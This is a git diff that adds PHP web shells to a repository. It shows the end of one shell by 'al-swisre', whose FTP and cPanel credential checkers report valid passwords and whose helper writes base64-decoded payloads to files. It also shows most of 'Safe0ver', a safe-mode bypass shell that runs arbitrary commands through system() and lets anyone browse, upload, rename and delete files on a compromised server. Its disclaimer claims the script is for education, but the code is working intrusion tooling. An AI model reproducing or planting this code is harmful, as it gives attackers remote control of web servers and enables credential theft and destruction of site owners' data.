+  return "????";
+ }
+}
+
+function sa_download($path)
+	{
+	header('Content-Description: File Transfer');
+    header('Content-Type: application/octet-stream');
+    header('Content-Disposition: attachment; filename='.basename($path));
+    header('Content-Transfer-Encoding: binary');
+    header('Expires: 0');
+    header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
+    header('Pragma: public');
+    header('Content-Length: ' . filesize($path));
+    ob_clean();
+    flush();
+    readfile($path);
+    exit;
+	}
+
+    function findit($mytext,$starttag,$endtag) {
+ $posLeft  = @stripos($mytext,$starttag)+strlen($starttag);
+ $posRight = @stripos($mytext,$endtag,$posLeft+1);
+ return  @substr($mytext,$posLeft,$posRight-$posLeft);
+}
+
+function MsSQL()
+{
+	if(@function_exists('mssql_connect'))
+	{
+		$msSQL = '<font color="red">ON</font>';
+	}
+	else
+	{
+		$msSQL = '<font color="green">OFF</font>';
+	}
+	return $msSQL;
+}
+function MySQL2()
+{
+	$mysql_try = @function_exists('mysql_connect');
+	if($mysql_try)
+	{
+		$mysql = '<font color="red">ON</font>';
+	}
+	else
+	{
+		$mysql = '<font color="green">OFF</font>';
+	}
+	return $mysql;
+}
+function Gzip()
+{
+	if (@function_exists('gzencode'))
+	{
+		$gzip = '<font color="red">ON</font>';
+	}
+	else
+	{
+		$gzip = '<font color="green">OFF</font>';
+	}
+	return $gzip;
+}
+function MysqlI()
+{
+	if (@function_exists('mysqli_connect'))
+	{
+		$mysqli = '<font color="red">ON</font>';
+	}
+	else
+	{
+		$mysqli = '<font color="green">OFF</font>';
+	}
+	return $mysqli;
+}
+function MSQL()
+{
+	if (@function_exists('msql_connect'))
+	{
+		$mSql = '<font color="red">ON</font>';
+	}
+	else
+	{
+		$mSql = '<font color="green">OFF</font>';
+	}
+	return $mSql;
+}
+function PostgreSQL()
+{
+	if(@function_exists('pg_connect'))
+	{
+		$postgreSQL = '<font color="red">ON</font>';
+	}
+	else
+	{
+		$postgreSQL = '<font color="green">OFF</font>';
+	}
+	return $postgreSQL;
+}
+
+function Oracle()
+{
+	if(@function_exists('ocilogon'))
+	{
+		$oracle = '<font color="red">ON</font>';
+	}
+	else
+	{
+		$oracle = '<font color="green">OFF</font>';
+	}
+	return $oracle;
+}
+
+
+function RegisterGlobals()
+{
+	if(@ini_get('register_globals'))
+	{
+		$registerg= '<font color="red">ON</font>';
+	}
+	else
+	{
+		$registerg= '<font color="green">OFF</font>';
+	}
+	return $registerg;
+}
+function HardSize($size)
+{
+	if($size >= 1073741824)
+	{
+		$size = @round($size / 1073741824 * 100) / 100 . " GB";
+	}
+	elseif($size >= 1048576)
+	{
+		$size = @round($size / 1048576 * 100) / 100 . " MB";
+	}
+	elseif($size >= 1024)
+	{
+		$size = @round($size / 1024 * 100) / 100 . " KB";
+	}
+	else
+	{
+		$size = $size . " B";
+	}
+	return $size;
+}
+function Curl()
+{
+	if(extension_loaded('curl'))
+	{
+		$curl = '<font color="red">ON</font>';
+	}
+	else
+	{
+		$curl = '<font color="green">OFF</font>';
+	}
+	return $curl;
+}
+
+function magicQouts()
+{
+	$mag=get_magic_quotes_gpc();
+	if (empty($mag))
+	{
+		$mag = '<font color="green">OFF</font>';
+	}
+	else
+	{
+		$mag= '<font color="red">ON</font>';
+	}
+	return $mag;
+}
+
+function openBaseDir()
+{
+$openBaseDir = @ini_get("open_basedir");
+if (!$openBaseDir)
+    {
+		$openBaseDir = '<font color="green">OFF</font>';
+	}
+    else
+	{
+		$openBaseDir = '<font color="red">ON</font>';
+	}
+	return $openBaseDir;
+}
+
+function ftp_check($host,$user,$pass,$timeout){
+$ch = curl_init();
+curl_setopt($ch, CURLOPT_URL, "ftp://$host");
+curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
+curl_setopt($ch, CURLOPT_FTPLISTONLY, 1);
+curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
+curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
+curl_setopt($ch, CURLOPT_FAILONERROR, 1);
+$data = curl_exec($ch);
+if ( curl_errno($ch) == 28 ) {
+
+print "<b> Error : Connection timed out </b>";
+exit;}
+
+elseif ( curl_errno($ch) == 0 ){
+
+print
+"
+<b>found username : <font color='#FF0000'> $user </font> - password :
+<font color='#FF0000'> $pass </font></b><br>";}curl_close($ch);
+exit;}
+
+
+function cpanel_check($host,$user,$pass,$timeout){
+$ch = curl_init();
+curl_setopt($ch, CURLOPT_URL, "http://$host:2082");
+curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
+curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
+curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
+curl_setopt($ch, CURLOPT_FAILONERROR, 1);
+$data = curl_exec($ch);
+if ( curl_errno($ch) == 28 ) {
+print "<b> Error : Connection timed out</b>";
+exit;}
+elseif ( curl_errno($ch) == 0 ){
+
+print
+"
+<b>found username : <font color='#FF0000'>$user</font> - password :
+<font color='#FF0000'>$pass </font></b><br>"; }curl_close($ch);
+exit; }
+
+
+		function op_sa($f,$t) {
+			$w = @fopen($f,"w") or @function_exists('file_put_contents');
+			if($w){
+				@fwrite($w,@base64_decode($t));
+				@fclose($w);
+			}
+		}
+
+
+  echo "</td></tr></table></div> |<b class='foter'>Progr4m3r by <a href='$pg?sws=ab'>al-swisre</a></b>|<b class='foter'>E-m4il : <a href='#'>oy3@hotmail.com</a></b>|<b class='foter'>My twitter : <a target='_blank' href='http://twitter.com/#!/al_swisre'>al_swisre</a></b>| </html> ";
+
+
+
+?>
+
+
+
diff --git a/php/safe0ver.php b/php/safe0ver.php
new file mode 100644
index 0000000..a2e0e59
--- /dev/null
+++ b/php/safe0ver.php
@@ -0,0 +1,934 @@
+ <?php 
+ 
+ 
+ /*
+ *****************************************************************************************************************
+ *                           Safe0ver Shell - Safe Mod Bypass By Evilc0der - Edited By KingDefacer               *
+ *****************************************************************************************************************
+ 
+ *****************************************************************************************************************
+ 
+ !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! 
+ !!   Dikkat ! Script Egitim Amacli Yazilmistir.Scripti Kullanarak Yapacaginiz Illegal eylemlerden sorumlu Degiliz. 
+ !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! 
+ */ 
+ 
+ 
+ /*Setting some envirionment variables...*/ 
+ 
+ /* I added this to ensure the script will run correctly...
+    Please enter the Script's filename in this variable. */   
+ $SFileName=$PHP_SELF;
+ 
+ /* uncomment the two following variables if you want to use http
+    authentication. This will password protect your PHPShell */
+ //$http_auth_user = "phpshell";    /* HTTP Authorisation username, uncomment if you want to use this */
+ //$http_auth_pass = "phpshell";    /* HTTP Authorisation password, uncomment if you want to use this */   
+ $c = "/s.html";  //need scripts coder's names     
+ 
+ error_reporting(0);
+ $PHPVer=phpversion();
+ $isGoodver=(intval($PHPVer[0])>=4);
+ $scriptTitle = "Safe0ver";
+ $scriptident = "$scriptTitle By Evilc0der.com";
+ 
+ $urlAdd = "";
+ $formAdd = "";
+ 
+ function walkArray($array){
+   while (list($key, $data) = each($array))
+     if (is_array($data)) { walkArray($data); }
+     else { global $$key; $$key = $data; global $urlAdd; $urlAdd .= "$key=".urlencode($data)."&";}
+ }
+ 
+ if (isset($_PUT)) walkArray($_PUT);
+ if (isset($_GET)) walkArray($_GET);
+ if (isset($_POST)) walkArray($_POST);
+ 
+ 
+ $pos = strpos($urlAdd, "s=r");
+ if (strval($pos) != "") {
+ $urlAdd= substr($urlAdd, 0, $pos);
+ }
+ 
+ $urlAdd .= "&s=r&";
+ 
+ if (empty($Pmax))
+     $Pmax = 125;   /* Identifies the max amount of Directories and files listed on one page */
+ if (empty($Pidx)) 
+     $Pidx = 0;
+ 
+ $dir = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $dir )));
+ $file = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $file )));
+ 
+ $scriptdate = "7 Subat 2007";
+ $scriptver = "Bet@ Versiyon";
+ $LOCAL_IMAGE_DIR = "img";
+ $REMOTE_IMAGE_URL = "img";
+ $img = array(
+                 "Edit"         => "edit.gif",
+                 "Download"     => "download.gif",
+                 "Upload"     => "upload.gif",
+                 "Delete"     => "delete.gif",
+                 "View"         => "view.gif",
+                 "Rename"     => "rename.gif",
+                 "Move"         => "move.gif",
+                 "Copy"         => "copy.gif",
+                 "Execute"     => "exec.gif"
+             );
+ 
+ while (list($id, $im)=each($img))
+     if (file_exists("$LOCAL_IMAGE_DIR/$im"))
+         $img[$id] = "<img height=\"16\" width=\"16\" border=\"0\" src=\"$REMOTE_IMAGE_URL/$im\" alt=\"$id\">";
+     else
+          $img[$id] = "[$id]";
+ 
+ 
+ 
+ 
+ /* HTTP AUTHENTICATION */
+ 
+     if  ( ( (isset($http_auth_user) ) && (isset($http_auth_pass)) ) && ( !isset($PHP_AUTH_USER) || $PHP_AUTH_USER != $http_auth_user || $PHP_AUTH_PW != $http_auth_pass)  ||  (($logoff==1) && $noauth=="yes")  )   { 
+         setcookie("noauth","");
+         Header( "WWW-authenticate:  Basic realm=\"$scriptTitle $scriptver\"");
+         Header( "HTTP/1.0  401  Unauthorized");
+         echo "Your username or password is incorrect";
+         exit ;
+                  
+     } 
+ 
+ function buildUrl($display, $url) {
+         global $urlAdd;
+         $url = $SFileName . "?$urlAdd$url";
+     return "<a href=\"$url\">$display</a>";
+ }
+ 
+ function sp($mp) {
+     for ( $i = 0; $i < $mp; $i++ )
+         $ret .= "&nbsp;";
+     return $ret;
+ }
+ 
+ function spacetonbsp($instr) { return str_replace(" ", "&nbsp;", $instr);  } 
+ 
+ function Mydeldir($Fdir) {
+     if (is_dir($Fdir)) {
+         $Fh=@opendir($Fdir);
+          while ($Fbuf = readdir($Fh))
+              if (($Fbuf != ".") && ($Fbuf != ".."))
+                 Mydeldir("$Fdir/$Fbuf");
+         @closedir($Fh);
+                 return rmdir($Fdir);
+     }    else {
+         return unlink($Fdir);
+     }
+ }
+ 
+ 
+ function arrval ($array) {
+ list($key, $data) = $array;
+ return $data;
+ }
+ 
+ function formatsize($insize) {  
+     $size = $insize;
+     $add = "B";
+     if ($size > 1024) {
+          $size = intval(intval($size) / 1.024)/1000;
+          $add = "KB";
+      }
+      if ($size > 1024) {
+          $size = intval(intval($size) / 1.024)/1000;
+          $add = "MB";
+      }
+      if ($size > 1024) {
+          $size = intval(intval($size) / 1.024)/1000;
+          $add = "GB";
+      }
+      if ($size > 1024) {
+          $size = intval(intval($size) / 1.024)/1000;
+          $add = "TB";
+      }
+      return "$size $add";
+ }
+ 
+ if ($cmd != "downl") {
+     ?>
+ 
+ <!-- <?php echo $scriptident ?>, <?php echo $scriptver ?>, <?php echo $scriptdate ?>  -->
+<HTML>
+  <HEAD>
+   <STYLE>
+   <!--
+     A{ text-decoration:none; color:navy; font-size: 12px }
+     body {
+ 	font-size: 12px;
+ 	font-family: arial, helvetica;
+ 	scrollbar-width: 5;
+ 	scrollbar-height: 5;
+ 	scrollbar-face-color: white;
+ 	scrollbar-shadow-color: silver;
+ 	scrollbar-highlight-color: white;
+ 	scrollbar-3dlight-color:silver;
+ 	scrollbar-darkshadow-color: silver;
+ 	scrollbar-track-color: white;
+ 	scrollbar-arrow-color: black;
+ 	background-color: #CCCCCC;
+     }
+     Table { font-size: 12px; }
+     TR{ font-size: 12px; }
+     TD{
+ 	font-size: 12px;
+ 	font-family: arial, helvetical;
+ 	BORDER-LEFT: black 0px solid;
+ 	BORDER-RIGHT: black 0px solid;
+ 	BORDER-TOP: black 0px solid;
+ 	BORDER-BOTTOM: black 0px solid;
+ 	COLOR: black;
+ 	background: #CCCCCC;
+     }
+     .border{       BORDER-LEFT: black 1px solid;
+             BORDER-RIGHT: black 1px solid;
+             BORDER-TOP: black 1px solid;
+             BORDER-BOTTOM: black 1px solid;
+           }
+     .none  {       BORDER-LEFT: black 0px solid;
+             BORDER-RIGHT: black 0px solid;
+             BORDER-TOP: black 0px solid;
+             BORDER-BOTTOM: black 0px solid;
+           }
+     .inputtext {
+             background-color: #EFEFEF;
+             font-family: arial, helvetica;
+             border: 1px solid #000000;
+             height: 20;
+     }
+     .lighttd {       background: #F8F8F8;
+     }
+     .darktd {        background: #CCCCCC;
+     }
+     input { font-family: arial, helvetica;
+     }
+     .inputbutton {
+                         background-color: #CCCCCC;
+             border: 1px solid #000000;
+             border-width: 1px;
+             height: 20;
+     }
+     .inputtextarea {
+             background-color: #CCCCCC;
+             border: 1px solid #000000;
+             scrollbar-width: 5;
+             scrollbar-height: 5;
+             scrollbar-face-color: #EFEFEF;
+             scrollbar-shadow-color: silver;
+             scrollbar-highlight-color: #EFEFEF;
+             scrollbar-3dlight-color:silver;
+             scrollbar-darkshadow-color: silver;
+             scrollbar-track-color: #EFEFEF;
+             scrollbar-arrow-color: black;
+     }
+     .top { BORDER-TOP: black 1px solid; }
+     .textin { BORDER-LEFT: silver 1px solid;
+               BORDER-RIGHT: silver 1px solid;
+            BORDER-TOP: silver 1px solid;
+               BORDER-BOTTOM: silver 1px solid;
+               width: 99%; font-size: 12px; font-weight: bold; color: Black;
+             }
+     .notop { BORDER-TOP: black 0px solid; }
+     .bottom { BORDER-BOTTOM: black 1px solid; }
+     .nobottom { BORDER-BOTTOM: black 0px solid; }
+     .left { BORDER-LEFT: black 1px solid; }
+     .noleft { BORDER-LEFT: black 0px solid; }
+     .right { BORDER-RIGHT: black 1px solid; }
+     .noright { BORDER-RIGHT: black 0px solid; }
+     .silver{ BACKGROUND: #CCCCCC; }
+ body,td,th {
+ 	color: #660000;
+ }
+ a:link {
+ 	color: #000000;
+ 	text-decoration: none;
+ }
+ a:hover {
+ 	color: #00FF00;
+ 	text-decoration: none;
+ }
+ a:active {
+ 	color: #666666;
+ 	text-decoration: none;
+ }
+ a:visited {
+ 	text-decoration: none;
+ }
+ .style5 {
+ 	color: #660000;
+ 	font-weight: bold;
+ }
+   -->
+   </STYLE>
+   <TITLE><?php echo $SFileName ?></TITLE>
+  <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"></HEAD>
+  <body topmargin="0" leftmargin="0">
+  <div style="position: absolute; background: #CCCCCC; z-order:10000; top:0; left:0; width: 100%; height: 100%;">
+  <table nowrap width=100% border="0" cellpadding="0" cellspacing="0">
+    <tr>
+      <td width="100%" class="silver border"><center>
+          <strong> <font size=3><?php echo $scriptident ?> - <?php echo $scriptver ?> - <?php echo $scriptdate ?></font> </strong>
+      </center></td>
+    </tr>
+  </table>
+  <table width=100% height="100%" NOWRAP border="0">
+   <tr NOWRAP>
+    <td width="100%" NOWRAP><br>
+ 
+     <?php
+ }
+ 
+ if ( $cmd=="dir" ) {
+       $h=@opendir($dir);
+      if ($h == false) {
+           echo "<br><font color=\"red\">".sp(3)."\n\n\n\n
+                 Klasör Listelenemiyor!Lütfen Bypass Bölümünü Deneyin.<br>".sp(3)."\n
+                 Script Gecisi Tamamlayamadi!
+                 <br><br>".sp(3)."\n
+                 Klasöre Girmek Icin yetkiniz Olduguna emin Olunuz...
+                 <br><br></font>\n\n\n\n";
+      }
+         if (function_exists('realpath')) {
+         $partdir = realpath($dir);
+     }
+         else {
+         $partdir = $dir;
+     }
+      if (strlen($partdir) >= 100) {
+          $partdir = substr($partdir, -100);
+          $pos = strpos($partdir, "/");
+          if (strval($pos) != "") {
+              $partdir = "<--   ...".substr($partdir, $pos);
+          }
+         $partdir = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $partdir )));
+         $dir = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $dir ))); 
+     $file = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $file )));
+      }
+     ?>
+       <form name="urlform" action="<?php echo "$SFileName?$urlAdd"; ?>" method="POST"><input type="hidden" name="cmd" value="dir">
+          <table NOWRAP width="100%" border="0" cellpadding="0" cellspacing="0">
+       <tr>
+        <td width="100%" class="silver border">
+         <center>&nbsp;Safe0ver-Server File Browser...&nbsp;</center>
+        </td>
+       </tr>
+      </table>
+        <br>
+      <table width="100%" border="0" cellpadding="0" cellspacing="0">
+       <tr>
+            <td class="border nobottom noright">
+             &nbsp;Listeliyor:&nbsp;
+       </td>
+           <td width="100%" class="border nobottom noleft">
+            <table width="100%" border="0" cellpadding="1" cellspacing="0">
+              <tr>
+               <td NOWRAP width="99%" align="center"><input type="text" name="dir" class="none textin" value="<?php echo $partdir ?>"></td>
+               <td NOWRAP><center>&nbsp;<a href="javascript: urlform.submit();"><b>GiT<b></a>&nbsp;<center></td>
+              </tr>
+             </table>
+             
+       </td>
+      </tr>
+     </table>
+   <!--    </form>   -->
+         <table NOWRAP width="100%" border="0" cellpadding="0" cellspacing="0" >
+          <tr>
+       <td width="100%" NOWRAP class="silver border">
+        &nbsp;Dosya Adi&nbsp;
+       </td>
+           <td NOWRAP class="silver border noleft">
+        &nbsp;Yapilabilecekler&nbsp;&nbsp;
+       </td>
+           <td NOWRAP class="silver border noleft">
+        &nbsp;Boyut&nbsp;
+       </td>
+           <td width=1 NOWRAP class="silver border noleft">
+        &nbsp;Yetkiler&nbsp;
+       </td>
+           <td NOWRAP class="silver border noleft">
+        &nbsp;Son Düzenleme&nbsp;
+       </td>
+      <tr>
+     <?php
+ 
+ 
+           /* <!-- This whole heap of junk is the sorting section... */
+ 
+      $dirn     = array();
+      $filen     = array();
+      $filesizes    = 0;
+      while ($buf = readdir($h)) {
+         if (is_dir("$dir/$buf"))
+             $dirn[] = $buf;
+             else 
+              $filen[] = $buf;
+         }         
+         $dirno     = count($dirn) + 1;
+          $fileno    = count($filen) + 1;
+ 
+           function mycmp($a, $b){
+             if ($a == $b) return 0;
+             return (strtolower($a) < strtolower($b)) ? -1 : 1;
+         }
+ 
+         if (function_exists("usort")) {
+             usort($dirn, "mycmp");
+             usort($filen, "mycmp");
+         }
+         else {
+             sort ($dirn);
+              sort ($filen);
+          }
+     reset ($dirn);
+      reset ($filen);
+      if (function_exists('array_merge')) {
+         $filelist = array_merge ($dirn, $filen);
+     }
+      else {
+         $filelist = $dirn + $filen;
+     }
+ 
+     
+     if ( count($filelist)-1 > $Pmax ) {
+         $from = $Pidx * $Pmax;
+         $to = ($Pidx + 1) * $Pmax-1;
+         if ($to - count($filelist) - 1 + ($Pmax / 2) > 0 )
+             $to = count($filelist) - 1;
+         if ($to > count($filelist)-1)
+             $to = count($filelist)-1;
+         $Dcontents = array();
+         For ($Fi = $from; $Fi <= $to; $Fi++) {
+             $Dcontents[] = $filelist[$Fi];    
+         }
+ 
+     }
+     else {
+         $Dcontents = $filelist;
+     }
+     
+      $tdcolors = array("lighttd", "darktd");
+ 
+      while (list ($key, $file) = each ($Dcontents)) {
+           if (!$tdcolor=arrval(each($tdcolors))) {
+         reset($tdcolors);
+         $tdcolor = arrval(each($tdcolors));      }
+                    
+          if (is_dir("$dir/$file")) { /* <!-- If it's a Directory --> */
+                       /* <!-- Dirname --> */
+             echo "<tr><td NOWRAP class=\"top left right $tdcolor\">".sp(3).buildUrl( "[$file]", "cmd=dir&dir=$dir/$file") .sp(9)."</td>\n";
+                   /* <!-- Actions --> */
+             echo "<td NOWRAP class=\"top right $tdcolor\"><center>".sp(2)."\n";
+                  /* <!-- Rename --> */
+             if ( ($file != ".") && ($file != "..") )
+                 echo buildUrl($img["Rename"], "cmd=ren&lastcmd=dir&lastdir=$dir&oldfile=$dir/$file").sp(3)."\n";
+                  /* <!-- Delete --> */
+             if ( ($file != ".") && ($file != "..") )
+                 echo sp(3).buildUrl( $img["Delete"], "cmd=deldir&file=$dir/$file&lastcmd=dir&lastdir=$dir")."\n";
+                 /* <!-- End of Actions --> */
+             echo "&nbsp;&nbsp;</center></td>\n";
+                   /* <!-- Size --> */
+             echo "<td NOWRAP class=\"top right $tdcolor\">&nbsp;</td>\n";
+                  /* <!-- Attributes --> */
+             echo "<td NOWRAP class=\"top right $tdcolor\">&nbsp;&nbsp;\n";
+              echo "<strong>D</strong>";
+                 if ( @is_readable("$dir/$file") ) {
+                    echo "<strong>R</strong>";
+              }
+              if (function_exists('is_writeable')) {
+                 if ( @is_writeable("$dir/$file") ) {
+                      echo "<strong>W</stong>";
+                  }
+             }
+              else {
+                     echo "<strong>(W)</stong>";
+               }
+               if ( @is_executable("$dir/$file") ) {
+                  echo "<Strong>X<strong>";
+              }
+              echo "&nbsp;&nbsp;</td>\n";
+                  /* <!-- Date --> */
+             echo "<td NOWRAP class=\"top right $tdcolor\" NOWRAP>\n";
+              echo "&nbsp;&nbsp;".date("D d-m-Y H:i:s", filemtime("$dir/$file"))."&nbsp;&nbsp;";
+              echo "</td>";
+             echo "</tr>\n";
+ 
+             }
+           else { /* <!-- Then it must be a File... --> */
+                      /* <!-- Filename --> */
+             if ( @is_readable("$dir/$file") )
+                  echo "<tr><td NOWRAP class=\"top left right $tdcolor\">".sp(3).buildUrl( $file, "cmd=file&file=$dir/$file").sp(9)."</td>\n";
+               else
+                   echo "<tr><td NOWRAP class=\"top left right $tdcolor\">".sp(3).$file.sp(9)."</td>\n";
+                                  /* <!-- Actions --> */
+             echo "<td NOWRAP class=\"top right $tdcolor\"><center>&nbsp;&nbsp;\n";
+                  /* <!-- Rename --> */
+             echo buildUrl($img["Rename"], "cmd=ren&lastcmd=dir&lastdir=$dir&oldfile=$dir/$file").sp(3)."\n";
+                   /* <!-- Edit --> */
+             if ( (@is_writeable("$dir/$file")) && (@is_readable("$dir/$file")) )
+                  echo buildUrl( $img["Edit"], "cmd=edit&file=$dir/$file").sp(3)."\n";
+                    /* <!-- Copy --> */
+              echo buildUrl( $img["Copy"], "cmd=copy&file=$dir/$file")."\n";
+                   /* <!-- Move --> */
+             if ( (@is_writeable("$dir/$file")) && (@is_readable("$dir/$file")) )
+                      echo sp(3). buildUrl( $img["Move"], "cmd=move&file=$dir/$file")."\n";
+                     /* <!-- Delete --> */
+             echo sp(3). buildUrl( $img["Delete"], "cmd=delfile&file=$dir/$file&lastcmd=dir&lastdir=$dir")."\n";
+                  /* <!-- Download --> */
+             echo sp(3). buildUrl( $img["Download"], "cmd=downl&file=$dir/$file")."\n";
+                  /* <!-- Execute --> */
+             if ( @is_executable("$dir/$file") )
+                  echo sp(3).buildUrl( $img["Execute"], "cmd=execute&file=$dir/$file")."\n";
+                     /* <!-- End of Actions --> */
+             echo sp(2)."</center></td>\n";
+                  /* <!-- Size --> */
+             echo "<td NOWRAP align=\"right\" class=\"top right $tdcolor\" NOWRAP >\n";
+              $size = @filesize("$dir/$file");
+              If ($size != false) {
+                     $filesizes += $size;
+                 echo "&nbsp;&nbsp;<strong>".formatsize($size)."<strong>";
+             }
+             else
+                 echo "&nbsp;&nbsp;<strong>0 B<strong>";
+              echo "&nbsp;&nbsp;</td>\n";
+ 
+                  /* <!-- Attributes --> */
+             echo "<td NOWRAP class=\"top right $tdcolor\">&nbsp;&nbsp;\n";
+ 
+              if ( @is_readable("$dir/$file") )
+                  echo "<strong>R</strong>";
+                if ( @is_writeable("$dir/$file") )
+                  echo "<strong>W</stong>";
+                if ( @is_executable("$dir/$file") )
+                  echo "<Strong>X<strong>";
+                if (function_exists('is_uploaded_file')){
+                  if ( @is_uploaded_file("$dir/$file") )
+                      echo "<Strong>U<strong>";
+              }
+              else {
+                 echo "<Strong>(U)<strong>";
+             }
+              echo "&nbsp;&nbsp;</td>\n";
+                  /* <!-- Date --> */
+             echo "<td NOWRAP class=\"top right $tdcolor\" NOWRAP>\n";
+              echo "&nbsp;&nbsp;".date("D d-m-Y H:i:s", filemtime("$dir/$file"))."&nbsp;&nbsp;";
+              echo "</td>";
+              echo "</tr>\n";
+          }
+       }
+ 
+         echo "</table><table width=100% border=\"0\" cellpadding=\"0\" cellspacing=\"0\"><tr>\n<td NOWRAP width=100% class=\"silver border noright\">\n";
+       echo "&nbsp;&nbsp;".@count ($dirn)."&nbsp;Klasör,&nbsp;".@count ($filen)."&nbsp;Dosya&nbsp;&nbsp;\n";
+       echo "</td><td NOWRAP class=\"silver border noleft\">\n";
+       echo "&nbsp;&nbsp;Toplam Dosya Boyutu:&nbsp;".formatsize($filesizes)."&nbsp;&nbsp;<td></tr>\n";
+     
+     function printpagelink($a, $b, $link = ""){
+         if ($link != "") 
+             echo "<A HREF=\"$link\"><b>| $a - $b |</b></A>";
+         else
+             echo "<b>| $a - $b |</b>";
+     }
+         
+     if ( count($filelist)-1 > $Pmax ) {
+         echo "<tr><td colspan=\"2\" class=\"silver border notop\"><table width=\"100%\" cellspacing=\"0\" cellpadding=\"3\"><tr><td valign=\"top\"><font color=\"red\"><b>Page:</b></font></td><td width=\"100%\"><center>";
+         $Fi = 0;
+         while ( ( (($Fi+1)*$Pmax) + ($Pmax/2) ) < count($filelist)-1 ) {
+             $from = $Fi*$Pmax;
+             while (($filelist[$from]==".") || ($filelist[$from]=="..")) $from++; 
+             $to = ($Fi + 1) * $Pmax - 1;
+             if ($Fi == $Pidx)
+                 $link="";
+             else 
+                 $link="$SFilename?$urlAdd"."cmd=$cmd&dir=$dir&Pidx=$Fi";
+             printpagelink (substr(strtolower($filelist[$from]), 0, 5), substr(strtolower($filelist[$to]), 0, 5), $link);
+             echo "&nbsp;&nbsp;&nbsp;";
+             $Fi++;
+         }
+         $from = $Fi*$Pmax;
+         while (($filelist[$from]==".") || ($filelist[$from]=="..")) $from++; 
+         $to = count($filelist)-1;
+         if ($Fi == $Pidx)
+             $link="";
+         else 
+             $link="$SFilename?$urlAdd"."cmd=$cmd&dir=$dir&Pidx=$Fi";
+         printpagelink (substr(strtolower($filelist[$from]), 0, 5), substr(strtolower($filelist[$to]), 0, 5), $link);        
+         
+     
+         echo "</center></td></tr></table></td></tr>";
+     }
+ 
+ 
+         echo "</table>\n<br><table NOWRAP>";
+ 
+       if ($isGoodver) {
+         echo "<tr><td class=\"silver border\">&nbsp;<strong>PHP Versiyonu:&nbsp;&nbsp;</strong>&nbsp;</td><td>&nbsp;$PHPVer&nbsp;</td></tr>\n";
+     }
+      else {
+         echo "<tr><td class=\"silver border\">&nbsp;<strong>Server's PHP Version:&nbsp;&nbsp;</strong>&nbsp;</td><td>&nbsp;$PHPVer (Some functions might be unavailable...)&nbsp;</td></tr>\n";
+     }
+               /* <!-- Other Actions --> */
+        echo "<tr><td class=\"silver border\">&nbsp;<strong>Diger Islemler:&nbsp;&nbsp;</strong>&nbsp;</td>\n";
+       echo "<td>&nbsp;<b>".buildUrl( "| Yeni Dosya |", "cmd=newfile&lastcmd=dir&lastdir=$dir")."\n".sp(3).
+                          buildUrl( "| Yeni Klasör |", "cmd=newdir&lastcmd=dir&lastdir=$dir")."\n".sp(3).
+                  buildUrl( "| Dosya Yükle |", "cmd=upload&dir=$dir&lastcmd=dir&lastdir=$dir"). "</b>\n</td></tr>\n";
+         echo "<tr><td class=\"silver border\">&nbsp;<strong>Script Location:&nbsp;&nbsp;</strong>&nbsp;</td><td>&nbsp;$PATH_TRANSLATED</td></tr>\n";
+       echo "<tr><td class=\"silver border\">&nbsp;<strong>IP Adresin:&nbsp;&nbsp;</strong>&nbsp;</td><td>&nbsp;$REMOTE_ADDR&nbsp;</td></tr>\n";
+       echo "<tr><td class=\"silver border\">&nbsp;<strong>Bulundugun Klasör:&nbsp;&nbsp;</strong></td><td>&nbsp;$partdir&nbsp;</td></tr>\n";
+       echo "<tr><td valign=\"top\" class=\"silver border\">&nbsp;<strong>Semboller:&nbsp;&nbsp;</strong&nbsp;</td><td>\n";
+       echo "<table NOWRAP>";
+         echo "<tr><td><strong>D:</strong></td><td>&nbsp;&nbsp;Klasör.</td></tr>\n";
+        echo "<tr><td><strong>R:</strong></td><td>&nbsp;&nbsp;Okunabilir.</td></tr>\n";
+       echo "<tr><td><strong>W:</strong></td><td>&nbsp;&nbsp;Yazilabilir.</td></tr>\n";
+       echo "<tr><td><strong>X:</strong></td><td>&nbsp;&nbsp;Komut Calistirilabilir.</td></tr>\n";
+       echo "<tr><td><strong>U:</strong></td><td>&nbsp;&nbsp;HTTP Uploaded File.</td></tr>\n";
+       echo "</table></td>";
+      echo "</table>";
+      echo "<br>";
+          @closedir($h);
+   }
+   elseif ( $cmd=="execute" ) {/*<!-- Execute the executable -->*/
+      echo system("$file");
+  }
+ elseif ( $cmd=="deldir" ) { /*<!-- Delete a directory and all it's files --> */
+     echo "<center><table><tr><td NOWRAP>" ;
+      if ($auth == "yes") {
+         if (Mydeldir($file)==false) {
+              echo "Could not remove \"$file\"<br>Permission denied, or directory not empty...";
+           }
+          else {
+              echo "Successfully removed \"$file\"<br>";
+          }
+          echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Safe0ver'a Dön\"></form>";
+     }
+      else {
+         echo "Are you sure you want to delete \"$file\" and all it's subdirectories ?
+         <form action=\"$SFileName?$urlAdd\" method=\"POST\">
+         <input type=\"hidden\" name=\"cmd\" value=\"deldir\">
+          <input type=\"hidden\" name=\"lastcmd\" value=\"$lastcmd\">
+          <input type=\"hidden\" name=\"lastdir\" value=\"$lastdir\">
+          <input type=\"hidden\" name=\"file\" value=\"$file\">
+          <input type=\"hidden\" name=\"auth\" value=\"yes\">
+          <input type=\"submit\" value=\"Yes\"></form>
